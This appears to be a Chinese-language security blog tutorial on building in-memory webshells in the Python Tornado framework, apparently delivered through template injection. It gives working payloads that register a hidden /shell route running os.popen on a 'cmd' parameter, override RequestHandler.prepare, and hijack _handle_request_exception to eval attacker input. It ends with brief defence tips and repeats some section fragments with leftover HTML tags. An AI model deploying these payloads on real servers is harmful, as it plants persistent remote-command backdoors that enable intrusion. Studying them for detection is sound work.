Tornado框架内存马技术深入解析<\/h1>

一、内存马基本概念<\/h2>

内存马（Memory Shell）是一种驻留在内存中的恶意后门技术，它不需要在磁盘上存储文件，通过修改Web应用程序的运行时代码逻辑来实现持久化控制。<\/p>

在Tornado框架中实现内存马主要有两种思路：<\/p>

注册一个新的URL，绑定恶意函数<\/li>

修改原有的URL处理逻辑<\/li> <\/ol>

二、Tornado模板机制与内存马<\/h2>
Tornado的模板系统有一个重要特性：一旦调用`self.render()<\/code>方法，就会实例化一个tornado.template.Loader<\/code>，之后即使修改模板文件内容，也不会重新实例化。<\/p>`
`解决方法<\/strong>：需要清空tornado.web.RequestHandler._template_loaders<\/code>，否则在利用时会一直使用第一个传入的payload。<\/p>`

三、路由规则分析与新增注册路由<\/h2>
1. 路由添加机制<\/h3>
Tornado的Application<\/code>类提供了add_handlers<\/code>方法，类似于Flask中的add_url_rule<\/code>函数，可以将指定的路由加入当前的路由表中。<\/p>
关键点<\/strong>：如果能够控制输入并触发该方法，就可以在运行时向应用中加入新的处理程序。<\/p>
2. add_handlers函数参数构造<\/h3>
add_handlers<\/code>函数接受两个参数：<\/p>

host_pattern<\/code>：字符串类型，通常构造为.*<\/code>匹配所有域名<\/li>
host_handlers<\/code>：类型为_RuleList<\/code>，较为复杂<\/li>
<\/ul>
3. _RuleList与add_rules<\/h3>
add_rules<\/code>方法用于向路由器添加新的规则：<\/p>

每个规则由匹配器(Matcher<\/code>)和目标处理器(target<\/code>)组成<\/li>
匹配器决定哪些请求应该被处理<\/li>
目标处理器是实际处理请求的对象<\/li>
<\/ul>
当传入元组或列表且第一个元素为字符串时，Tornado会自动调用PathMatches<\/code>类生成匹配器对象。<\/p>
示例<\/strong>：<\/p>
('\/path\/to\/match'<\/span>, handler_class)
<\/span><\/span><\/code><\/pre>其中'\/path\/to\/match'<\/code>将被转换成PathMatches<\/code>对象，handler_class<\/code>是处理请求的类。<\/p>
四、动态创建恶意RequestHandler<\/h2>
利用Python的type()<\/code>函数动态创建RequestHandler子类：<\/p>
type(
<\/span><\/span>    "x"<\/span>,  # 新类名<\/span>
<\/span><\/span>    (__import__("tornado"<\/span>).<\/span>web.<\/span>RequestHandler,),  # 继承自RequestHandler<\/span>
<\/span><\/span>    {
<\/span><\/span>        "get"<\/span>: lambda<\/span> self: self.<\/span>write(
<\/span><\/span>            str(__import__('os'<\/span>).<\/span>popen(
<\/span><\/span>                self.<\/span>get_query_argument("cmd"<\/span>)
<\/span><\/span>            ).<\/span>read())
<\/span><\/span>        )
<\/span><\/span>    }
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>解释<\/strong>：<\/p>

创建名为"x"的新类，继承自RequestHandler<\/code><\/li>
重写get<\/code>方法，从请求参数中提取"cmd"并执行<\/li>
通过os.popen<\/code>执行系统命令并将结果返回<\/li>
<\/ul>
完整Payload示例<\/h3>
app.<\/span>add_handlers(
<\/span><\/span>    ".*"<\/span>,  # 匹配所有域名<\/span>
<\/span><\/span>    [
<\/span><\/span>        (
<\/span><\/span>            "\/shell"<\/span>,  # 恶意路由路径<\/span>
<\/span><\/span>            type(
<\/span><\/span>                "x"<\/span>,
<\/span><\/span>                (__import__("tornado"<\/span>).<\/span>web.<\/span>RequestHandler,),
<\/span><\/span>                {
<\/span><\/span>                    "get"<\/span>: lambda<\/span> self: self.<\/span>write(
<\/span><\/span>                        str(__import__('os'<\/span>).<\/span>popen(
<\/span><\/span>                            self.<\/span>get_query_argument("cmd"<\/span>)
<\/span><\/span>                        ).<\/span>read())
<\/span><\/span>                    )
<\/span><\/span>                }
<\/span><\/span>            )
<\/span><\/span>        )
<\/span><\/span>    ]
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>五、覆盖处理函数技术<\/h2>
由于Tornado每次请求都是全新的handler和request，直接绑定恶意函数到handler实例无法持久化。<\/p>
解决方案：修改类级别行为<\/h3>
修改RequestHandler<\/code>类本身的方法，如prepare()<\/code>（每个请求开始前调用的方法）：<\/p>
handler.<\/span>__class__.<\/span>prepare =<\/span> lambda<\/span> self: self.<\/span>write(
<\/span><\/span>    str(__import__('os'<\/span>).<\/span>popen(
<\/span><\/span>        self.<\/span>get_query_argument("cmd"<\/span>, "id"<\/span>)
<\/span><\/span>    ).<\/span>read())
<\/span><\/span>) or<\/span> self.<\/span>finish()
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

handler.__class__<\/code>指向RequestHandler<\/code>类本身<\/li>
修改类方法会影响所有后续创建的实例<\/li>
使用self.get_query_argument<\/code>动态获取请求参数<\/li>
<\/ul>
六、异常处理机制下的内存马<\/h2>
1. Tornado异常处理流程<\/h3>
当请求处理过程中出现未捕获异常时，控制流会转移到RequestHandler._handle_request_exception<\/code>方法：<\/p>

记录异常信息（非Finish<\/code>类型异常）<\/li>
设置响应状态码（HTTPError<\/code>使用其状态码，否则默认500）<\/li>
调用send_error<\/code>发送错误响应<\/li>
<\/ol>
2. 数据输出机制<\/h3>

RequestHandler.write()<\/code>将数据写入内部缓冲区_write_buffer<\/code><\/li>
flush()<\/code>检查并发送未发送的数据<\/li>
request.connection.write()<\/code>直接发送数据，绕过标准缓冲机制<\/li>
<\/ul>
3. 异常处理内存马构造<\/h3>
覆盖_handle_request_exception<\/code>方法：<\/p>
handler.<\/span>__class__.<\/span>_handle_request_exception =<\/span> lambda<\/span> x, y: [
<\/span><\/span>    x.<\/span>write((str(eval(x.<\/span>get_query_argument("cmd"<\/span>, "id"<\/span>)))).<\/span>encode()),
<\/span><\/span>    x.<\/span>finish()
<\/span><\/span>][0<\/span>]
<\/span><\/span><\/code><\/pre>解析<\/strong>：<\/p>

忽略传入的异常对象y<\/code>，直接执行命令<\/li>
从查询参数获取"cmd"值（默认"id"）<\/li>
使用eval()<\/code>执行命令字符串<\/li>
将结果转换为字符串并编码<\/li>
写入响应并结束请求<\/li>
[0]<\/code>确保即使write()<\/code>抛出异常也会执行finish()<\/code><\/li>
<\/ol>
七、防御与检测建议<\/h2>

代码审计<\/strong>：检查是否有动态类创建和路由添加操作<\/li>
运行时监控<\/strong>：监控add_handlers<\/code>和_handle_request_exception<\/code>的修改<\/li>
权限控制<\/strong>：限制执行系统命令的能力<\/li>
输入验证<\/strong>：严格验证所有用户输入，特别是eval\/popen的参数<\/li>
内存检测<\/strong>：定期扫描内存中的异常类和方法修改<\/li>
<\/ol>
八、参考资源<\/h2>

SecMap-SSTI-tornado<\/a><\/li>
Tornado官方文档关于路由和异常处理的部分<\/li>
<\/ul>

Tornado框架内存马技术深入解析<\/h1>

五、覆盖处理函数技术<\/h2> 由于Tornado每次请求都是全新的handler和request，直接绑定恶意函数到handler实例无法持久化。<\/p>

六、异常处理机制下的内存马<\/h2>

八、参考资源<\/h2> SecMap-SSTI-tornado<\/a><\/li> Tornado官方文档关于路由和异常处理的部分<\/li> <\/ul>

五、覆盖处理函数技术<\/h2>
由于Tornado每次请求都是全新的handler和request，直接绑定恶意函数到handler实例无法持久化。<\/p>

八、参考资源<\/h2>

SecMap-SSTI-tornado<\/a><\/li>
Tornado官方文档关于路由和异常处理的部分<\/li> <\/ul>